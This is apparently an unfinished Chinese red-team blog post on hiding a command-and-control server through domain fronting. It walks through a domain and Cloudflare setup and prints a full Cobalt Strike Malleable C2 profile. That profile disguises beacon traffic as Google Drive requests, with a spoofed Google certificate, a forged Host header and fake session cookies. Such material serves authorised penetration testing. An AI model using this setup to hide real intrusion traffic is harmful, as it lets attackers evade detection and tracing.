title: C2隐藏-域前置
tags: 匿名
categories:
- RedTeam
cover: ‘https://blog-1255850204.cos.ap-guangzhou.myqcloud.com/uPic/wQQKmI.png‘
abbrlink: 137b
date: 2020-07-25 17:58:24
C2隐藏之域名前置(未完待续)
前言
在进行红队测试中,如果没对自己的C2服务器做一定的保护,在做命令控制时,在受害机器产生与C2服务器通信的网络连接,那么就很容易被溯源到真实ip,同时C2服务器也暴露了,也就很难进行下一步动作。
域前置
域前置(英语:Domain fronting),又译为域名幌子,是一种隐藏连接真实端点来规避互联网审查的技术。在应用层上运作时,域前置使用户能通过HTTPS连接到被屏蔽的服务,而表面上像在与另一个完全不同的站点通信。
域前置”技术是一种审查规避技术,主要用于隐蔽通信中的远程端点。“域前置”发生在应用层,主要适用了HTTPS协议进行通信,通信中的远程端点原本是被禁止的,通过使用“域前置”技术,让检测器误认为是一个其他的合法地址,进而绕过检测。核心思想是在不同的通信层使用了不一样的域名。在一个HTTPS请求中,通信外层使用了一个域名:DNS请求和TLS SNI (Server Name Indication);而在通信内层,则使用了另一个域名:HTTP Host Header,这个域名由于在HTTPS加密之下,所以对检测器而言是不可见的。
这里借用大佬的一张图
域前置技术可以高信誉度的域名进行前置,例如Google、Microsoft等,这里我只是简单实践一下
准备
- C2域名
- Cloudflare账号一枚
-
域名相关配置
Godaddy购置一枚域名,并将NS服务器设置为Cloudflare的地址进行解析
- Cloudflare设置对应的A记录
- Cloudflare调整缓存配置
关闭开发模式和缓存 - 配置C2.profile
这里有大佬harmj0y整理的集合https://github.com/rsmudge/Malleable-C2-Profiles 这里有个google profile参考
#
# Google Drive
#
# Author: @bluscreenofjeff
#
#set https cert info
https-certificate {
set CN "*.google.com"; #Common Name
set O "Google Inc"; #Organization Name
set C "US"; #Country
set L "Mountain View"; #Locality
set ST "California"; #State or Province
set validity "365"; #Number of days the cert is valid for
}
#default Beacon sleep duration and jitter
set sleeptime "60000";
set jitter "20";
#default useragent for HTTP comms
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
#IP address used to indicate no tasks are available to DNS Beacon
set dns_idle "8.8.4.4";
#Force a sleep prior to each individual DNS request. (in milliseconds)
set dns_sleep "0";
#Maximum length of hostname when uploading data over DNS (0-255)
set maxdns "235";
http-get {
set uri "/viewerng/meta";
client {
header "Accept" "text/html,application/xml;*/*;";
header "Accept-Encoding" "gzip, deflate";
header "Host" "drive.google.com";
header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";
#session metadata
metadata {
base64url;
netbios;
base64url;
parameter "id";
}
parameter "u" "0";
}
server {
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
header "Connection" "close";
#Beacon's tasks
output {
print;
}
}
}
http-post {
set uri "/viewersng/meta";
set verb "GET";
client {
header "Accept" "text/html,application/xml;*/*;";
header "Accept-Encoding" "gzip, deflate";
header "Host" "drive.google.com";
header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";
output {
base64url;
netbios;
base64url;
parameter "id";
}
#session ID
id {
parameter "u";
}
}
server {
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
header "Connection" "close";
output {
print;
}
}
}
#change the stager server
http-stager {
server {
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
}
}